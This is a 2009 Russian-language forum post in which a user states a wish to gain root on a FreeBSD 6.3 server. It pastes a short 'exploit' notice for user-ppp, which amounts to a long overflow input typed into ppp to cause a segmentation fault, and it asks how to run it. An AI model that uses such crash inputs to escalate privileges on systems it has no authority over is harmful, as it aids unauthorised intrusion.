
09.09.2009, 19:33
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Здраствуйте.
Хочу поднять прова root на сервере ОС
FreeBSD 6.3-RELEASE-p5
Сам эксплоит:
Код:
/***********************************************************************************/
/*** pppx.conf - Point to Point Protocol (a.k.a. user-ppp) exploit by sipher ***/
/*** 2003 / 12 /23 - PRIVATE CODE ***/
/*** Program terminated with signal 11, Segmentation fault. ***/
/*** #0 0xbeefdead in ?? () ***/
/***********************************************************************************/
I just tested this on FreeBSD 6.3. This bug was discovered on NetBSD. It also works on OpenBSD (unconfirmed on 4.2)
Steps to reproduce:
1. Run ppp
2. type the following (or atleat some variation of)
~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxx
This will produce a segmentation violation (Core dumped).
Discovered by: sipher
Shouts: princess^pookie,spithash,burnout,#codemasters,#hackers@dalnet
Обьясните пожалуйсто что такое "user-ppp" и как его запустить?
|
|
|